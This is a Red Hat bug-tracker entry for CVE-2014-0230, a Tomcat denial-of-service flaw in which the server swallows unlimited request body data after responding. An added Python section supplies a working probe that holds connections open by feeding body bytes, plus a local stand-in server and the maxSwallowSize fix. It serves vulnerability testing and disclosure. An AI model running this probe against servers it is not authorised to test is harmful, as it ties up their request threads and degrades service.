Bug 1191200 (CVE-2014-0230)

Summary: CVE-2014-0230 tomcat: non-persistent DoS attack by feeding data by aborting an upload
Product: [Other] Security Response
Reporter: Vasyl Kaigorodov <vkaigoro>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: NEW
Severity: low
Priority: low
Version: unspecified
CC: aileenc, alazarot, alee, asantos, aszczucz, bbaranow, bdawidow, bmaxwell, brms-jira, ccoleman, cdewolf, chazlett, coolsvap, dandread, darran.lofthouse, dmcphers, epp-bugs, etirelli, fnasser, gnaik, grocha, gvarsami, huwang, ivan.afonichev, jason.greene, java-sig-commits, jawilson, jboss-set, jbpapp-maint, jclere, jcoleman, jdg-bugs, jdoyle, jialiu, joelsmith, jokerman, jolee, jpallich, jrusnack, jshepherd, kconner, krzysztof.daniel, ldimaggi, lgao, lmeyer, lpetrovi, mbabacek, mbaluch, mmccomas, mweiler, mwinkler, myarboro, nwallace, pcheung, pgier, psakar, pslavice, rhq-maint, rrajasek, rsvoboda, rwagner, rzhang, security-response-team, soa-p-jira, spinder, tcunning, theute, tkirby, ttarrant, twalsh, vhalbert, vtunka, weli
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard: impact=low,public=20140719,reported=20150210,source=upstream,cvss2=5/AV:N/AC:L/Au:N/C:N/I:N/A:P,cwe=CWE-770,brms-5/jbossweb=new,eap-4/jbossweb=wontfix,eap-5/jbossweb=wontfix,eap-6/jbossweb=affected,epel-6/tomcat=affected,fedora-all/tomcat=notaffected,fsw-6/jbossweb=new,jbews-1/tomcat5=wontfix,jbews-1/tomcat6=wontfix,jbews-2/tomcat6=affected,jbews-2/tomcat7=affected,jbews-3/tomcat7=affected,jbews-3/tomcat8=affected,jdg-6/jbossweb=affected,jdv-6/jbossweb=affected,jon-3/jbossweb=affected,jpp-6/jbossweb=affected,openshift-1/jbossweb=wontfix,rhel-5/tomcat5=wontfix,rhel-6/tomcat6=notaffected,rhel-7/tomcat=affected,soap-4/jbossweb=wontfix,soap-5/jbossweb=wontfix
Fixed In Version: tomcat 6.0.44, tomcat 7.0.55, tomcat 8.0.9
Doc Type: Bug Fix
Doc Text:
It was found that Tomcat would keep a connection open after answering a request whose body it had not fully read, swallowing the remainder of the body with no size limit. A remote attacker could potentially use this flaw to exhaust the pool of available connections and prevent further legitimate connections to the Tomcat server from being made.
Bug Depends On: 1227592, 1227593, 1236893, 1236899, 1236905, 1236910, 1236915, 1236920, 1259358, 1259359, 1352004    
Bug Blocks: 1191201, 1253310    

Description Vasyl Kaigorodov 2015-02-10 16:38:32 UTC
When a response for a request with a request body is returned to the user agent before the request body is fully read, by default Tomcat swallows the remaining request body so that the next request on the connection may be processed. There was no limit to the size of request body that Tomcat would swallow. This permitted a limited Denial of Service as Tomcat would never close the connection and a processing thread would remain allocated to the connection.

Upstream fix:

http://svn.apache.org/viewvc?view=revision&revision=1603781
http://svn.apache.org/viewvc?view=revision&revision=1603811
http://svn.apache.org/viewvc?view=revision&revision=1609176
http://svn.apache.org/viewvc?view=revision&revision=1659295
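
The behaviour described above can be checked from the outside: send a POST that declares a body far larger than you intend to send, wait for the response, then keep feeding body bytes and see whether the server ever gives up on the connection. The probe below is an added example written for this page, not code from the bug report, from Red Hat or from Tomcat. It assumes the target path answers without first consuming the request body (a static resource is the usual choice; a servlet that reads the whole body before responding will simply time out in the first phase). The function names `probe_swallow`, `start_stand_in` and `check_stand_in` are mine, and the small in-process server is a constructed stand-in that only imitates the swallow behaviour (unbounded, or closing after a cap) so the probe can be run offline; it is not Tomcat.

```python
import socket
import socketserver
import threading
from dataclasses import dataclass

@dataclass
class SwallowResult:
    responded: bool   # server answered before the body was complete
    closed: bool      # server closed the connection at or before `limit` body bytes
    body_sent: int    # body bytes pushed after the response (best effort)

def probe_swallow(host, port, path="/", declared=100_000_000,
                  limit=4 * 1024 * 1024, chunk=64 * 1024, timeout=5.0):
    """POST a huge Content-Length, wait for the response, then keep feeding body
    bytes. `limit` must exceed the cap you expect (Tomcat's default is 2 MiB)."""
    s = socket.create_connection((host, port), timeout=timeout)
    try:
        s.sendall((f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
                   f"Content-Length: {declared}\r\n"
                   f"Content-Type: application/octet-stream\r\n\r\n").encode())
        head = b""
        try:
            while b"\r\n\r\n" not in head:
                d = s.recv(4096)
                if not d:
                    return SwallowResult(False, True, 0)
                head += d
        except socket.timeout:
            return SwallowResult(False, False, 0)  # path reads its body first; pick another
        sent, payload = 0, b"A" * chunk
        while sent < limit:
            try:
                s.sendall(payload)
            except socket.timeout:
                return SwallowResult(True, False, sent)  # stopped reading, still holding on
            except OSError:
                return SwallowResult(True, True, sent)   # EPIPE/ECONNRESET: server gave up
            sent += len(payload)
        closed = False   # still accepting at `limit`: does it close now, or hold the thread?
        try:
            while s.recv(65536):
                pass
            closed = True                   # clean EOF
        except ConnectionResetError:
            closed = True                   # RST after close with unread body
        except socket.timeout:
            pass                            # connection (and its thread) still held
        return SwallowResult(True, closed, sent)
    finally:
        s.close()

# Constructed stand-in for a connector, NOT Tomcat: it answers a POST before reading
# the body, then swallows the rest. max_swallow=None reproduces the unbounded pre-fix
# behaviour; an int makes it close once that many bytes were swallowed, like the fix.
class _StandIn(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True
    max_swallow = None

class _Handler(socketserver.BaseRequestHandler):
    def handle(self):
        buf = b""
        while b"\r\n\r\n" not in buf:
            d = self.request.recv(4096)
            if not d:
                return
            buf += d
        head, body = buf.split(b"\r\n\r\n", 1)
        declared = 0
        for line in head.split(b"\r\n"):
            if line.lower().startswith(b"content-length:"):
                declared = int(line.split(b":", 1)[1].strip())
        self.request.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
        swallowed, cap = len(body), self.server.max_swallow
        while swallowed < declared:
            if cap is not None and swallowed > cap:
                return                      # fixed behaviour: stop swallowing and close
            d = self.request.recv(65536)
            if not d:
                return
            swallowed += len(d)
        # unbounded behaviour: the whole body is read and the thread stays with the connection

def start_stand_in(max_swallow=None):
    srv = _StandIn(("127.0.0.1", 0), _Handler)
    srv.max_swallow = max_swallow
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]

def check_stand_in(max_swallow, limit=256 * 1024, chunk=16 * 1024):
    """Probe a local stand-in with small sizes so the demonstration runs in seconds."""
    srv, port = start_stand_in(max_swallow)
    try:
        return probe_swallow("127.0.0.1", port, limit=limit, chunk=chunk, timeout=2.0)
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    print("unbounded swallow (pre-fix):", check_stand_in(None))
    print("swallow capped at 64 KiB   :", check_stand_in(64 * 1024))
```

Against a real server, call `probe_swallow(host, port, path)` with the defaults: a result of `responded=True, closed=False, body_sent=4194304` means the connection (and the processing thread behind it) was still being held after 4 MiB of post-response body, which is the unbounded swallow this bug describes; `closed=True` well before the limit is what the fixed versions do. The upstream fix made the cap configurable through the `maxSwallowSize` attribute on the Connector in server.xml (default 2097152 bytes; a negative value removes the limit), so a tightened deployment might read `<Connector port="8080" protocol="HTTP/1.1" maxSwallowSize="1048576" ... />`. Note that the probe occupies one of the target's request-processing threads for as long as it runs, so keep `timeout` short and run it only against hosts you are allowed to test.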

Comment 7 Jason Shepherd 2015-06-29 04:21:58 UTC
I tested this vulnerability against the version of Tomcat6 shipped with RHEL 6.6 and found it to be unaffected. I'm updating the whiteboard to reflect that.

Comment 11 Jason Shepherd 2015-06-30 02:15:32 UTC
Created tomcat tracking bugs for this issue:

Affects: epel-6 [bug 1236920]

Comment 13 errata-xmlrpc 2015-08-13 15:29:45 UTC
This issue has been addressed in the following products:

  JBEWS 2 for RHEL 7
  JBEWS 2 for RHEL 6
  JBEWS 2 for RHEL 5

Via RHSA-2015:1622 https://rhn.redhat.com/errata/RHSA-2015-1622.html

Comment 14 errata-xmlrpc 2015-08-13 15:31:10 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Web Server 2.1.0

Via RHSA-2015:1621 https://rhn.redhat.com/errata/RHSA-2015-1621.html

Comment 19 errata-xmlrpc 2015-12-16 18:21:21 UTC
This issue has been addressed in the following products:

  JBoss Web Server 3.0.2

Via RHSA-2015:2661 https://rhn.redhat.com/errata/RHSA-2015-2661.html

Comment 20 errata-xmlrpc 2015-12-16 18:22:02 UTC
This issue has been addressed in the following products:

  JWS 3.0 for RHEL 7

Via RHSA-2015:2660 https://access.redhat.com/errata/RHSA-2015:2660

Comment 21 errata-xmlrpc 2015-12-16 18:22:45 UTC
This issue has been addressed in the following products:

  JWS 3.0 for RHEL 6

Via RHSA-2015:2659 https://access.redhat.com/errata/RHSA-2015:2659

Comment 22 errata-xmlrpc 2016-04-05 20:41:09 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 6

Via RHSA-2016:0598 https://rhn.redhat.com/errata/RHSA-2016-0598.html

Comment 23 errata-xmlrpc 2016-04-05 20:42:34 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 7

Via RHSA-2016:0597 https://rhn.redhat.com/errata/RHSA-2016-0597.html

Comment 24 errata-xmlrpc 2016-04-05 20:43:39 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 6

Via RHSA-2016:0596 https://rhn.redhat.com/errata/RHSA-2016-0596.html

Comment 25 errata-xmlrpc 2016-04-05 20:44:42 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 5

Via RHSA-2016:0595 https://rhn.redhat.com/errata/RHSA-2016-0595.html

Comment 26 errata-xmlrpc 2016-04-05 22:21:01 UTC
This issue has been addressed in the following products:



Via RHSA-2016:0599 https://rhn.redhat.com/errata/RHSA-2016-0599.html

Comment 27 errata-xmlrpc 2016-04-28 17:41:56 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 6

Via RHSA-2016:0596 https://rhn.redhat.com/errata/RHSA-2016-0596.html

Comment 28 errata-xmlrpc 2016-04-28 17:42:30 UTC
This issue has been addressed in the following products:

  JBEAP 6.4.z for RHEL 5

Via RHSA-2016:0595 https://rhn.redhat.com/errata/RHSA-2016-0595.html

Comment 29 Tomas Hoger 2018-09-27 11:47:05 UTC
The tomcat packages in Red Hat Enterprise Linux 7 were updated to the fixed upstream version via the following erratum, released as part of the Red Hat Enterprise Linux 7.3.

https://access.redhat.com/errata/RHSA-2016:2599